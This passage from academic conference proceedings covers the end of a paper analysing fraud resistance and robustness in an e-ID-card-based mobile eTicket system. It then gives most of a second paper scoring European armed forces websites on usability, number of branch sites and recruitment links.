functionality of the e-ID card is used. This process, Fig14, allows a more robust proof that whoever holds<br />
the identity card has the correspond<strong>in</strong>g identity of the card and hence is the owner of the eTicket (digital<br />
signature). Note that this validation process does not add more security from a cryptographic po<strong>in</strong>t of<br />
view; it does however verify the identity of the document and its owner.<br />
47
Figure 14: Strong biometric authentication<br />
6. Analysis of the architecture<br />
Paul Crocker and Vasco Nicolau<br />
The advantages and disadvantages of the architecture proposed, its robustness and resilience to attack<br />
are now discussed <strong>in</strong> brief.<br />
6.1 Fraud<br />
The payment agent has knowledge of the eTicket (Hash) however the possibility of (re)creat<strong>in</strong>g a valid<br />
but fraudulent eTicket is limited. This is due to the fact that <strong>in</strong> order to achieve this the payment agent<br />
would have to recreate a valid Ticket-Control, but <strong>in</strong> order to do this the payment agent would need the<br />
credentials of the citizens card (PIN) and the actual card itself – as the sign<strong>in</strong>g process is done on the<br />
card. Hence the security is as solid as the overall e-ID card security. Note any Payment Agent should be<br />
identified and registered and comply with m<strong>in</strong>imum security requirements.<br />
If the Ticket-Control is compromised, either by theft at or <strong>in</strong> transmission to the back office <strong>in</strong>formation<br />
system then the attacker could feasibly use this <strong>in</strong>formation. However it would still be necessary to<br />
identify the service/good purchased and the attacker could only use the ticket <strong>in</strong> the case where only the<br />
simple authentication process was necessary. This opens the <strong>in</strong>terest<strong>in</strong>g possibility of chang<strong>in</strong>g a simple<br />
authentication to a strong authentication if such a theft was discovered and the use of random spot<br />
checks (simple to strong) as a dissuad<strong>in</strong>g method.<br />
The system is also safe from more complex attacks such as <strong>in</strong> the situation where a phone that conta<strong>in</strong>s<br />
an eTicket for a flight is stolen and the clients’ national e-ID card is also stolen. In this case, the attacker<br />
may even know the sign<strong>in</strong>g PIN and could thus pass the strong validation, but <strong>in</strong> this type of scenario it is<br />
often necessary to validate the owner of the ticket, biometrically us<strong>in</strong>g Match-on-Card or via some other<br />
proof such as possession of a passport.<br />
6.2 e-ID storage capacity<br />
The e-ID cards have a reduced private writable <strong>in</strong>formation space (notebook) therefore it’s up to the client<br />
to manage this space efficiently and correctly. Tools can be provided to help the client <strong>in</strong> this process,<br />
either Web based or for download and also made available at the Payment agent, Merchant’s Site etc. In<br />
the event of the citizen or other application delet<strong>in</strong>g by mistake or maliciously the contents of the e-IDs<br />
notebook area then the immediate consequence is the citizen would be unable to use the ticket if strong<br />
authentication was required, s<strong>in</strong>ce this type of authentication requires the use of citizen's card and the<br />
reconstruction of the Ticket-Control us<strong>in</strong>g the <strong>in</strong>formation that was on the card. In this case the citizens<br />
would have to return to a payment agent to address the problem.<br />
48
6.3 Robustness<br />
Paul Crocker and Vasco Nicolau<br />
The fact that the eTicket is placed on the e-ID card and not on the phone makes the system robust with<br />
respect to theft of the mobile phone. Consider what happens <strong>in</strong> the event the phone is stolen or the<br />
customer loses the Ticket-Control. In this situation the customer must notify a payment agent, who may<br />
then modify the weak validation process to strong authentication, which implies the use of citizen's card<br />
and <strong>in</strong> this case the ticket is guaranteed not to be used fraudulently. In the worst-case scenario the e-ID<br />
is also stolen and then an attacker would also have to know the PIN authentication. In this more serious<br />
situation, after a client has notified a payment agent of the theft, the system should automatically modify a<br />
strong validation type to "extra strong" requir<strong>in</strong>g biometric validation.<br />
In situations where the QR-Code is unable to be read correctly, for <strong>in</strong>stance if the phone loses battery<br />
power or problems with image quality then there are several alternatives, <strong>in</strong> the case of an NFC enabled<br />
mobile phone then it may still be possible to use the phone to read the QR-code as NFC uses magnetic<br />
field <strong>in</strong>duction (GSMA 2007) for power. On the other hand the QR-Code can be pr<strong>in</strong>ted avoid<strong>in</strong>g image<br />
quality problems on the handset. F<strong>in</strong>ally the client can ask that the authentication level be raised to strong<br />
and <strong>in</strong> this case the QR-Code can be replaced by the e-ID.<br />
7. Conclusions<br />
This paper has described an <strong>in</strong>novative system us<strong>in</strong>g the e-ID citizen cards and digital signature<br />
mechanisms. The security layer has <strong>in</strong>troduced the concept of three levels of security for the<br />
authentication process which allows the system to be both flexible and able to adapt to the dynamic<br />
needs of each of the players <strong>in</strong>volved and the <strong>in</strong>dividual event or service requirements. Although<br />
associated with ticket<strong>in</strong>g its implementation <strong>in</strong> other areas and <strong>in</strong> other contexts, such as audit trails for<br />
confidential documents, could also be advantageous and is be<strong>in</strong>g explored.<br />
In conclusion, the architecture described provides a simplified view of the mobile payment authentication<br />
and validation environment, which doesn’t change the common habits of people and is consistent with<br />
modern trends where the mobile is used to store/transport <strong>in</strong>formation. It makes use of the best current<br />
technologies NFC/QR-code <strong>in</strong> a mobile environment. It makes use of the Portuguese e-ID, a trusted,<br />
secure and credible document to provide a mechanism for flexible, secure authentication and validation<br />
of tickets.<br />
References<br />
Crocker, P., de Sousa, S. M. & Nicolau, V. (2010) Sniff<strong>in</strong>g with Portuguese Identity Card for fun and profit,<br />
Proceed<strong>in</strong>gs of the N<strong>in</strong>th European Conf. on Information Warfare and <strong>Security</strong> (ECIW 2010).<br />
Eched, Y, Billiaert, E & Veyret E. (2009) e-Gov 2.0 The Keys to Success, Gemalto White Paper [onl<strong>in</strong>e]<br />
http://www.epractice.eu/en/library/292758 [Accessed 9 March 2011]<br />
Benito, R et al. (2008) <strong>Security</strong> Issues <strong>in</strong> the Context of authentication us<strong>in</strong>g mobile devices, Editors: Naumann,I and<br />
Hogben,G, European Network and Information <strong>Security</strong> Agency (ENISA) [onl<strong>in</strong>e],<br />
http://www.enisa.europa.eu/act/it/eid/mobile-eid/at_download/fullReport [Accessed 9 March 2011]<br />
Exame Informática (2010) Movensis e CGD vão estrear pagamentos por telemóveis, [onl<strong>in</strong>e],<br />
http://aeiou.exame<strong>in</strong>formatica.pt/movensis-e-cgd-vao-estrear-pagamentos-por-telemovel-video=f1007055.<br />
[Accessed 9 March 2011]<br />
GSMA (2007), Mobile NFC technical guidel<strong>in</strong>e, [onl<strong>in</strong>e], http://www.gsmworld.com/documents/ gsma_nfc2_wp.pdf.<br />
[Accessed 9 March 2011]<br />
Hughes, N and Lonie, S (2009) M-Pesa: Mobile money for the unbanked. Innovations: Technology, Governance,<br />
Globalization 2007 2:1-2, 63-81<br />
Leenes, R et al (2009) Towards pan- European recognition of electronic ID.The Stork e-ID consortium, [onl<strong>in</strong>e],<br />
https://www.eid-stork.eu/dmdocuments/public/D2.2_f<strong>in</strong>al._1.pdf. [Accessed 9 March 2011]<br />
NIST, National Institute of Standards and Technology (2009), Digital Signature Standard, [onl<strong>in</strong>e],<br />
http://csrc.nist.gov/publications/fips/fips186-3/fips_186-3.pdf. [Accessed 9 March 2011]<br />
Oberthur (2009) Bank ID for SEB, [onl<strong>in</strong>e] http://www.oberthur.com [Accessed 9 March 2011]<br />
Rankl, W (2007) Smart Card Applications Design Models for Us<strong>in</strong>g and Programm<strong>in</strong>g Smart Cards, John Wiley,<br />
England.<br />
SIBS (2010) SIBS MB-Phone, [onl<strong>in</strong>e], http://www.sibs.pt/pt/mb/prodserv/mbphone/. [Accessed 9 March 2011]<br />
49
Evaluation of the Armed Forces Websites of the European<br />
Countries<br />
Pedro Cunha 1 , Parcídio Gonçalves 1 , Vítor Sá 1 , Sérgio Tenreiro de Magalhães 1 and<br />
Miguel Pimenta 2<br />
1<br />
Universidade Católica Portuguesa, Braga, Portugal<br />
2<br />
Regimento de Cavalaria 6, Exército Português, Braga, Portugal<br />
pjgscunha@gmail.com<br />
parcidio@gmail.com<br />
vitor.sa@braga.ucp.pt<br />
stmagalhaes@braga.ucp.pt<br />
pimenta.jmas@mail.exercito.pt<br />
Abstract: The armed forces are a critical component of the national security strategy of several European countries.<br />
Despite the peace that has succeeded the cold war, several armies, <strong>in</strong> peacetime, have elements recruited with<br />
promises of <strong>in</strong>dividual opportunities. The countries have two forms of recruitment of their troops: by volunteer<strong>in</strong>g or<br />
by mandatory <strong>in</strong>corporation. Follow<strong>in</strong>g the trends of the modern world, <strong>in</strong>terconnected <strong>in</strong> a network, it becomes<br />
essential to the <strong>in</strong>stitutions to mark their presence on the Internet. The Armed Forces <strong>in</strong> their various branches are no<br />
exception; there are numerous sites with relevant <strong>in</strong>formation, be<strong>in</strong>g used as a channel for dissem<strong>in</strong>ation and<br />
fundrais<strong>in</strong>g. S<strong>in</strong>ce young people represent a large share of the population us<strong>in</strong>g the Internet, and this is the target<br />
population for recruitment, it becomes mandatory to use the <strong>in</strong>ternet as a communication channel between them. It<br />
was carried out a qualitative study of all sites of European armed forces, and their branches, <strong>in</strong> order to assess their<br />
quality and differences. The approach focused on the evaluation of sites for their ability to <strong>in</strong>form, update, quantity<br />
and quality of content, service availability, use and visual attractiveness, and ease of communication. The study has<br />
also tried to verify if the countries with volunteer <strong>in</strong>corporation were produc<strong>in</strong>g websites with higher levels of quality,<br />
reflect<strong>in</strong>g the need to <strong>in</strong>vest <strong>in</strong> order to recruit. On the other hand, countries with compulsive <strong>in</strong>corporation could have<br />
lower <strong>in</strong>vestments <strong>in</strong> their websites, once the satisfaction of the need for staff is guarantied. We considered 38<br />
countries, with an <strong>in</strong>itial usability study where data about the characteristics considered important for proper<br />
construction of a website as well as for a good and easy relationship with the user of this type of site were collected.<br />
This research def<strong>in</strong>ed the parameters to evaluate the sites and groups were created with the parameters of the<br />
different areas of analysis of those sites. The evaluation shows that there are differences <strong>in</strong> quality of sites for each<br />
of the countries evaluated <strong>in</strong> terms of graphics, usability and content, and that where there is a greater difference<br />
between the countries is on the number of exist<strong>in</strong>g sites by country. It is clear that there are countries that <strong>in</strong>vest<br />
strategically <strong>in</strong> this area while others do not. It was also clear that there is a difference between Eastern and Western<br />
Europe <strong>in</strong> the quality and <strong>in</strong>vestment made <strong>in</strong> the sites of their armed forces. Divid<strong>in</strong>g the countries by their<br />
<strong>in</strong>corporation system, the differences are smaller, both <strong>in</strong> terms of number of sites for the military, either as to the<br />
average assessment of each scheme. In countries where the <strong>in</strong>corporation is mandatory, <strong>in</strong>vestment <strong>in</strong> <strong>in</strong>dependent<br />
sites for each branch has not been neglected for a considerable part of the countries, a little more than half. But it is<br />
<strong>in</strong> countries where recruitment is made on a voluntary basis that there are more sites for the different branches,<br />
which may <strong>in</strong>dicate an exist<strong>in</strong>g competitiveness for staff recruitment.<br />
Keywords: armed forces, websites, recruitment, Europe<br />
1. Introduction<br />
The aftermath of Second World War led to a grow<strong>in</strong>g sense of concern for the safety of the population.<br />
This situation has led to many European countries to take concrete actions, embodied <strong>in</strong> adherence to<br />
collective defense organizations (NATO and Warsaw Pact) and the reorganization of its armed forces, to<br />
ensure the <strong>in</strong>tegrity of its territory and the security of their populations. This feel<strong>in</strong>g of security and<br />
<strong>in</strong>security, embodied <strong>in</strong> a mutual fear that characterized the period of the Cold War, would end only with<br />
the demise of the Soviet Union <strong>in</strong> 1991. In this period of nearly 40 years, we have seen the recruitment of<br />
large numbers of civilians for entry <strong>in</strong>to the armed forces of most countries <strong>in</strong> Europe, lead<strong>in</strong>g <strong>in</strong> many<br />
cases oversized armed forces to the real needs of some countries. The recruitment was standard<br />
practice for ensur<strong>in</strong>g the ma<strong>in</strong>tenance of staff seen as necessary.<br />
This situation changes from 1991. The level of conventional threat aga<strong>in</strong>st European countries was<br />
substantially reduced and the non conventional threat is to assume, s<strong>in</strong>ce then, greater attention by<br />
states and organizations responsible for security. Inevitably, the armed forces follow this amendment,<br />
feel<strong>in</strong>g an <strong>in</strong>creas<strong>in</strong>g need to improve its quality over quantity. The technological evolution of military<br />
equipment, catalyzed by the <strong>in</strong>cessant demand for weapons systems more efficient to cope with an<br />
<strong>in</strong>creas<strong>in</strong>gly effective enemy, requires the existence of military <strong>in</strong>creas<strong>in</strong>gly better prepared. This reality<br />
50
Pedro Cunha et al.<br />
has led some European countries to evolve to different systems of recruitment and tra<strong>in</strong><strong>in</strong>g, better<br />
adapted to the new reality and new weapons systems.<br />
Therefore, it becomes <strong>in</strong>terest<strong>in</strong>g to understand the reality of the armed forces of European countries by<br />
analyz<strong>in</strong>g the recruit<strong>in</strong>g method they use and how the divulgation made at sites they have, does or not,<br />
change the number and the quality of the civilians who are presented to serve their armed forces and<br />
their countries.<br />
1.1 State of the art<br />
The armed forces are an <strong>in</strong>tegral part of society <strong>in</strong> various countries of Europe. As regards Anna<br />
Leander, it is argued to be important to <strong>in</strong>tegrate society, to form political organizations, to ensure civil<br />
states and to control the use of violence <strong>in</strong> society (Leander, 2004). Accord<strong>in</strong>g to Stanislav Andreski,<br />
military organizations <strong>in</strong>fluence the social structure, especially by determ<strong>in</strong><strong>in</strong>g the distribution of power or,<br />
<strong>in</strong> other words, the ability to use violence (Andreski, 1968). As referred previously, the society is<br />
constantly evolv<strong>in</strong>g, and the various branches of the armed forces felt the need to monitor these<br />
developments. As stated by Alfred Vagts, we can say that each stage of social progress or regression<br />
produced military <strong>in</strong>stitutions <strong>in</strong> accordance with their needs and ideas, its culture and its economy<br />
(Vagts, 1981).<br />
One of the factors that most <strong>in</strong>fluence had <strong>in</strong> the paradigm shift of the armed forces, <strong>in</strong> Europe and <strong>in</strong> the<br />
rest of the world, was the end of the Cold War. As noted by John J. Mearsheimer, the profound changes<br />
<strong>in</strong> course <strong>in</strong> Europe have been widely seen as harb<strong>in</strong>gers of a new era of peace. With the end of the Cold<br />
War, it is said that the threat of war loom<strong>in</strong>g over Europe for over four decades are evaporat<strong>in</strong>g<br />
(Mearsheimer, 1990).<br />
In the last three decades the army <strong>in</strong> peacetime recruited with promises of <strong>in</strong>dividual opportunities:<br />
money for college, professional skills, achievement, adventure and personal transformation. At first of a<br />
controversial war, many of those promises sounded <strong>in</strong>appropriate, if not absurd (Bailey, 2007).<br />
Because of this reality and dur<strong>in</strong>g this period, there was a military change <strong>in</strong> its relationship with market<br />
logic, which occurred naturally and virtually <strong>in</strong>visible. This change was an un<strong>in</strong>tended consequence of<br />
chang<strong>in</strong>g to the voluntary regime (Bailey, 2007).<br />
Some European countries have decided to end the recruitment as a result of geopolitical change and the<br />
limited utility of recruits for the post cold war missions, although other European countries plan to<br />
ma<strong>in</strong>ta<strong>in</strong> recruitment despite these same factors. Thus, it is probable the ext<strong>in</strong>ction of recruitment <strong>in</strong><br />
armies that seek to reduce the number of recruits, and the ma<strong>in</strong>tenance of this characteristic <strong>in</strong> the<br />
armies which aims to <strong>in</strong>crease the number of assets, and <strong>in</strong> armies of militia type (Jehn & Selden, 2002).<br />
The European countries that cont<strong>in</strong>ue to use conscription have cited his alleged budgetary sav<strong>in</strong>gs,<br />
almost as its only justification. In the period <strong>in</strong> which we live, post-war and post-Cold War era,<br />
conscription may not f<strong>in</strong>ish <strong>in</strong> Europe however its importance is no longer relevant (Jehn & Selden,<br />
2002).<br />
The armed forces are also shaped by advertis<strong>in</strong>g for recruitment, s<strong>in</strong>ce advertis<strong>in</strong>g can reach a greater<br />
number of recruitment-age populations more quickly and economically. The military advertis<strong>in</strong>g tries to<br />
<strong>in</strong>cite the act of relatively low cost of contact<strong>in</strong>g a recruiter or go to the army website (Bailey, 2007). The<br />
Internet and the <strong>in</strong>creas<strong>in</strong>g number of sites as an advertis<strong>in</strong>g medium, has become an undeniable reality<br />
<strong>in</strong> the <strong>in</strong>formation age <strong>in</strong> which we live. The armed forces be<strong>in</strong>g part of the society and the world are<br />
us<strong>in</strong>g this concept as a channel for dissem<strong>in</strong>ation and fundrais<strong>in</strong>g. As John Thompson, the development<br />
of communication mediums has changed <strong>in</strong> a profound and irreversible way the nature of communication<br />
<strong>in</strong> contemporary society (Thompson, 1995).<br />
Networks are very old forms of human practice, but took a new life <strong>in</strong> our time by becom<strong>in</strong>g <strong>in</strong>formation<br />
networks, fueled by the Internet (Castells, 2002). S<strong>in</strong>ce young people represent a large share of the<br />
population us<strong>in</strong>g the Internet, and this is the target population for recruitment, it becomes mandatory to<br />
use the <strong>in</strong>ternet as a communication channel.<br />
51
1.2 The problem<br />
Pedro Cunha et al.<br />
The adoption of the Internet as a means of communication by the armed forces raises the question of its<br />
effectiveness and its real significance <strong>in</strong> the society to which they are <strong>in</strong>tended, tak<strong>in</strong>g <strong>in</strong>to account the<br />
reduction of the population of military age and dist<strong>in</strong>guish<strong>in</strong>g between those who have a need for<br />
volunteer recruitment and those with obligatory military service.<br />
With this article, we <strong>in</strong>tend to carry out a qualitative study of all sites of European armed forces, and their<br />
branches <strong>in</strong> order to assess their quality and differences. The approach will focus on the assessment of<br />
sites <strong>in</strong> the follow<strong>in</strong>g aspects: its ability to <strong>in</strong>form, update, quantity and quality of content, service<br />
availability, use and visual attractiveness, and ease of communication. It will be also exam<strong>in</strong>ed <strong>in</strong><br />
countries where the merger is voluntary, if there is a greater <strong>in</strong>vestment <strong>in</strong> the sites of the armed forces,<br />
and their quality compared to the countries <strong>in</strong> which the <strong>in</strong>corporation is obligatory.<br />
2. Methodology<br />
This article reveals a qualitative study of sites of European armed forces, which considered the follow<strong>in</strong>g<br />
38 countries: Albania, Austria, Belarus, Belgium, Bosnia and Herzegov<strong>in</strong>a, Bulgaria, Croatia, Denmark,<br />
Slovakia, Slovenia, Spa<strong>in</strong>, Estonia, F<strong>in</strong>land France, Greece, Hungary, Ireland, Italy, Latvia, Lithuania,<br />
Luxembourg, Macedonia, Malta, Moldova, Montenegro, Norway, Poland, Portugal, United K<strong>in</strong>gdom,<br />
Czech Republic, Romania, Russia, Serbia, Sweden, Switzerland and Ukra<strong>in</strong>e. The evaluation was<br />
excluded, for not hav<strong>in</strong>g armed forces, the follow<strong>in</strong>g countries: Andorra, Iceland, Liechtenste<strong>in</strong>, Monaco,<br />
San Mar<strong>in</strong>o and the Vatican. Due to its diplomatic complexity, Cyprus was also excluded, s<strong>in</strong>ce that<br />
territory has two armed forces, one on the Greek side and another on the Turkish side (CIA, 2011).<br />
We started by mak<strong>in</strong>g a research on the usability of websites, to this end, we referred to the site<br />
http://www.usability.gov, from where it was collected <strong>in</strong>formation on the characteristics considered<br />
important for proper construction of a website, as well as for a good and easy relationship with the user of<br />
this site. Moreover it was also consulted and analyzed the book Research-Based Web Design & Usability<br />
Guidel<strong>in</strong>es (Leavitt & Shneiderman, 2007). This research has def<strong>in</strong>ed the parameters to evaluate the<br />
sites, and groups were created with the parameters of different areas of analysis: homepage; layout;<br />
pag<strong>in</strong>ation and scroll; headers; titles and labels; l<strong>in</strong>ks; appearance of text; lists; widgets; graphics, images<br />
and multimedia content; organization; and research. As the analysis of sites was done separately by<br />
more than one person, each of which assessed its share of sites of European armed forces, and to avoid<br />
subjectivity <strong>in</strong> the evaluation, it was registered only if each site met each assessment parameter, by us<strong>in</strong>g<br />
a Boolean value (represented by 0 and 1). Dur<strong>in</strong>g the assessment was given to each parameter the<br />
correspond<strong>in</strong>g value, later added with elements of the same group and divided by the number of<br />
parameters result<strong>in</strong>g <strong>in</strong> the f<strong>in</strong>al value for the group. The values were registered and treated <strong>in</strong> a spread<br />
sheet, which results are presented later <strong>in</strong> this article. The f<strong>in</strong>al result of the assessment has a m<strong>in</strong>imum<br />
value of 0 and maximum of 8.79. This value results from the sum of the value of all assessed groups,<br />
which results from the sum of the relative importance of each parameter divided by the number of group<br />
parameters.<br />
3. Analysis<br />
The first step of this study was to search all sites of European armed forces for future analysis. One<br />
obstacle encountered was the difficulty <strong>in</strong> f<strong>in</strong>d<strong>in</strong>g the sites <strong>in</strong>tended for analysis, s<strong>in</strong>ce some armed forces<br />
do not have sites, as is the case of Macedonia and Moldova. Moreover, we also found a site under<br />
construction, Malta, preclud<strong>in</strong>g their analysis. Throughout the evaluation we faced with several desktop<br />
environments, some more complex and some more simple, but <strong>in</strong> general with relative ease of use. To<br />
perform the evaluation we considered the sites of the ma<strong>in</strong> branches of the armed forces: army, navy and<br />
air force. In some cases, it was also considered the site of the m<strong>in</strong>istry of defense of the country <strong>in</strong><br />
evaluation, because it conta<strong>in</strong>s <strong>in</strong>formation related to the branches of the armed forces and also l<strong>in</strong>ks to<br />
the sites of those branches.<br />
3.1 General assessment of all countries<br />
After a qualitative analysis of all sites it was possible for us to verify that the difference between the<br />
values obta<strong>in</strong>ed by each country under review has no great difference, as shown <strong>in</strong> Figure 1.<br />
52
6,00<br />
5,00<br />
4,00<br />
3,00<br />
2,00<br />
1,00<br />
0,00<br />
Albania<br />
Germany<br />
Austria<br />
Pedro Cunha et al.<br />
Obta<strong>in</strong>ed scores<br />
ByeloRussia<br />
Belgium<br />
Bosnia and<br />
Bulgaria<br />
Croacia<br />
Denmark<br />
Slovakia<br />
Slovenia<br />
Spa<strong>in</strong><br />
Estonia<br />
F<strong>in</strong>land<br />
France<br />
Greece<br />
Netherland<br />
Hungary<br />
Ireland<br />
Italy<br />
Latvia<br />
Lithuania<br />
Luxemburg<br />
Montenegro<br />
Norway<br />
Poland<br />
Portugal<br />
United<br />
Check<br />
Romania<br />
Russia<br />
Serbia<br />
Sweden<br />
Switzerland<br />
Ukra<strong>in</strong>e<br />
Figure 1: Scores of all assessed countries<br />
Speak<strong>in</strong>g <strong>in</strong> absolute values, the m<strong>in</strong>imum was obta<strong>in</strong>ed by Belarus with 3.02 and the maximum score<br />
was obta<strong>in</strong>ed by Sweden with 5.49. This represents 34.34% and 62.50% respectively as compared to the<br />
maximum score possible. However, most countries had an assessment with<strong>in</strong> a range between 50% and<br />
60%, with an average of 54.38% compared to the maximum possible score, which <strong>in</strong>dicates a<br />
satisfactory classification of the evaluated sites. This is presented <strong>in</strong> Figure 2 and <strong>in</strong> Table 1.<br />
Throughout the analysis it was found that there is a reasonable <strong>in</strong>vestment for most European armed<br />
forces on their sites, reveal<strong>in</strong>g on average, a good level of <strong>in</strong>formation update, a nice graphic layout and<br />
simplicity of use. This shows that there is a technological sensitivity towards a greater need and<br />
will<strong>in</strong>gness to disclose <strong>in</strong>formation relevant to society, with the objective, <strong>in</strong> some cases, to attract new<br />
elements to their forces. Despite there is <strong>in</strong>vestment, there is a difference among countries <strong>in</strong> what<br />
concerns to hav<strong>in</strong>g only one website for all the branches of the armed forces – Albania, Byelorussia,<br />
Bosnia and Herzegov<strong>in</strong>a, Bulgaria, Croatia, Slovenia, Luxemburg, Check Republic, Russia, Serbia,<br />
Ukra<strong>in</strong>e – represent<strong>in</strong>g 32.43% of the countries; or hav<strong>in</strong>g a website for two of the branches of the armed<br />
forces, sometimes with one for those branches and a global <strong>in</strong>clud<strong>in</strong>g all of them – Austria, Slovakia,<br />
Hungary, Switzerland – that represent 11.43% of the evaluated websites; or hav<strong>in</strong>g a website for each<br />
one of the exist<strong>in</strong>g branches of the armed forces – Germany, Belgium, Denmark, Spa<strong>in</strong>, F<strong>in</strong>land, France,<br />
Greece, Netherlands, Ireland, Italy, Latvia, Lithuania, Montenegro, Norway, Poland, Portugal, United<br />
K<strong>in</strong>gdom, Romania, Sweden – that represent 54.29% of the evaluated websites (Figure 2).<br />
Figure 2: Scores and number of military websites<br />
Table 1: Relative percentage obta<strong>in</strong>ed by the assessed countries<br />
Countries % Countries % Countries % Countries %<br />
Albania 57,30% Slovakia 52,70% Ireland 55,00% United K<strong>in</strong>gdom 57,25%<br />
Germany 61,88% Slovenia 54,24% Italy 57,53% Check Republic 41,41%<br />
Austria 56,57% Spa<strong>in</strong> 58,51% Latvia 49,57% Romania 55,30%<br />
Byelorussia 34,34% Estonia 55,16% Lithuania 58,18% Russia 54,40%<br />
Belgium 55,52% F<strong>in</strong>land 53,56% Luxemburg 55,53% Serbia 60,68%<br />
Bosnia and Herzegov<strong>in</strong>a 49,02% France 58,24% Montenegro 52,38% Sweden 62,50%<br />
Bulgaria 46,05% Greece 54,88% Norway 54,23% Switzerland 58,97%<br />
Croacia 52,68% Netherland 57,87% Poland 57,69% Ukra<strong>in</strong>e 55,92%<br />
Denmark 54,02% Hungary 48,99% Portugal 55,23%<br />
53
Pedro Cunha et al.<br />
Another obta<strong>in</strong>ed value was the percentage of countries that have sites that <strong>in</strong>clude recruitment l<strong>in</strong>ks.<br />
68.57% of the countries have, at least, one website l<strong>in</strong>k<strong>in</strong>g to a recruitment page, while 31.43% did not.<br />
3.2 Voluntary Incorporation versus mandatory <strong>in</strong>corporation<br />
One of the significant elements <strong>in</strong> this study was the type of adopted <strong>in</strong>corporation <strong>in</strong> each one of the<br />
countries: 18 of the evaluated countries have voluntary <strong>in</strong>corporation, while the other 17 have mandatory<br />
military service.<br />
Despite what was expected, the countries with mandatory service obta<strong>in</strong>ed a better average <strong>in</strong> the<br />
websites evaluation, 55.45%, than the one obta<strong>in</strong>ed by those countries that need to conv<strong>in</strong>ce citizens to<br />
become voluntaries to service: 53.37% (Figure 3).<br />
Figure 3: Scores and number of sites <strong>in</strong> both mandatory and voluntary <strong>in</strong>corporation countries<br />
Concern<strong>in</strong>g the number of sites <strong>in</strong> each of the <strong>in</strong>corporation regimes, 61.11% of the countries with<br />
voluntary service have several sites, one for each of the armed forces branches, while this happens <strong>in</strong><br />
only 47.06% of the countries with mandatory <strong>in</strong>corporation. This shows that countries with voluntary<br />
<strong>in</strong>corporation have a higher level of <strong>in</strong>vestment <strong>in</strong> the creation of armed forces websites.<br />
From those countries with one website for each branch of the armed forces, 28.57% have a mandatory<br />
<strong>in</strong>corporation system, 71.43% have voluntary <strong>in</strong>corporation, 35.71% are from the Eastern Europe and<br />
64.29% are from the rest of Europe. The countries with a lower <strong>in</strong>vestment <strong>in</strong> the number of websites,<br />
hav<strong>in</strong>g only one website for all of the military branches, have the follow<strong>in</strong>g distribution: 56.25% have<br />
mandatory <strong>in</strong>corporation, 47.35% have voluntary <strong>in</strong>corporation, 81.25% are from the Eastern Europe and<br />
only 18.75% are from the rest of Europe.<br />
Another significant <strong>in</strong>dicator of the importance that the armed forces websites have <strong>in</strong> each country is the<br />
existence, or not, of a recruitment l<strong>in</strong>k, mak<strong>in</strong>g it easier to those <strong>in</strong>terested <strong>in</strong> jo<strong>in</strong><strong>in</strong>g the armed forces to<br />
obta<strong>in</strong> relevant <strong>in</strong>formation to that process and/or register themselves for <strong>in</strong>corporation. 77.78% of the<br />
countries with voluntary service have an <strong>in</strong>corporation l<strong>in</strong>k, while that happens <strong>in</strong> 58.82% of the countries<br />
with a mandatory <strong>in</strong>corporation system.<br />
3.3 Eastern Europe versus Western Europe<br />
Dur<strong>in</strong>g the evaluation it was perceptible the difference <strong>in</strong> <strong>in</strong>vestment, regard<strong>in</strong>g the number of the armed<br />
forces websites and regard<strong>in</strong>g the quality of the exist<strong>in</strong>g websites, between Eastern Countries and<br />
Western Countries. This was objectively confirmed by the f<strong>in</strong>al results as it can be seen <strong>in</strong> Figure 4.<br />
Figure 4: Score and number of websites of Western and Eastern Europe countries<br />
54
Pedro Cunha et al.<br />
Although be<strong>in</strong>g scarce <strong>in</strong> some of the <strong>in</strong>formation provided, as <strong>in</strong> provid<strong>in</strong>g specific websites for each<br />
branch of the armed forces, the difference between the Eastern Europe countries and the rest of the<br />
European countries <strong>in</strong> the average classification is not considerable, with the Eastern countries be<strong>in</strong>g<br />
classified with 52.00%, while the others have 56.90%. Despite this, there is a big difference <strong>in</strong> the number<br />
of websites of armed forces for each country, exist<strong>in</strong>g a big difference between the number of countries <strong>in</strong><br />
Eastern Europe that have only one general website for all the military branches, and the Western Europe<br />
countries <strong>in</strong> the same situation. Only 27.78% of the Eastern European countries have one website for<br />
each military branch, while 72.22% do not. In the Western Europe the scenario is the opposite, with<br />
82.35% of the countries provid<strong>in</strong>g a specific website for each branch of the armed forces. There is also a<br />
great difference between the Eastern and Western European Countries <strong>in</strong> what concerns to recruitment<br />
l<strong>in</strong>ks. 88.24% of the Western Europe countries have such a l<strong>in</strong>k, while that happens <strong>in</strong> only 50% of the<br />
Eastern Europe countries.<br />
4. Conclusions<br />
The performed evaluation allows the extraction of several conclusions regard<strong>in</strong>g the web communication<br />
policies of the European countries, through the analysis of the quality of their websites <strong>in</strong> what concerns<br />
to graphics, usability and contents.<br />
The Spanish website www.soldados.com stands out as an example of quality, <strong>in</strong> graphics, eas<strong>in</strong>ess of<br />
use, completeness of the menus, virtual maps <strong>in</strong>dicat<strong>in</strong>g missions, <strong>in</strong>teractive games, etc. Another<br />
demonstration of <strong>in</strong>vestment <strong>in</strong> this field is the Norwegian case. Norway has recently launched another<br />
doma<strong>in</strong>, complement<strong>in</strong>g the doma<strong>in</strong> mil.no with the access through the forsvaret.no doma<strong>in</strong> (forsvaret<br />
means defence). On the other extreme countries like Byelorussia can be found, with a very poorly<br />
constructed website (http://www.mod.mil.by).<br />
The data collected demonstrated that the biggest difference <strong>in</strong> the Internet communication strategy of the<br />
European countries lay <strong>in</strong> the number of military websites, where 81.25% of the countries that do not<br />
have one website for each branch of the armed forces is located <strong>in</strong> the Eastern Europe. It is clearly<br />
proven the existence of a difference <strong>in</strong> the quality of the military websites of Eastern and Western<br />
European countries.<br />
The differences found have obviously underp<strong>in</strong>n<strong>in</strong>g causes, forc<strong>in</strong>g us to exam<strong>in</strong>e and understand not<br />
only the current situation but also what might be the future development of these tools. We cannot ignore,<br />
as the cause of these differences, the conflicts that occurred <strong>in</strong> Europe over the past 20 years, of which<br />
we highlight the Balkans, Chechnya, Georgia and the war aga<strong>in</strong>st terrorism, among others, the political<br />
changes associated with German reunification, by the fall of the Berl<strong>in</strong> Wall, and the collapse of the<br />
former Soviet Union, whose breakup gave rise to a considerable number of <strong>in</strong>dependent countries, also<br />
<strong>in</strong> this paper. These new countries, this time awakened to the need of hav<strong>in</strong>g armed forces, hav<strong>in</strong>g<br />
started the process of develop<strong>in</strong>g its security and defense.<br />
Look<strong>in</strong>g specifically the countries of Eastern Europe, with few exceptions, the results reflect a constant<br />
that exists <strong>in</strong> almost all of them. Most countries live from their natural resources, or "rent" their territory for<br />
oil and gas pipel<strong>in</strong>es can reach other sites. This reality contributes to the issue of development of these<br />
countries is tilted <strong>in</strong> relation to the concern of the necessary for their survival. Thus, the work<strong>in</strong>g middle<br />
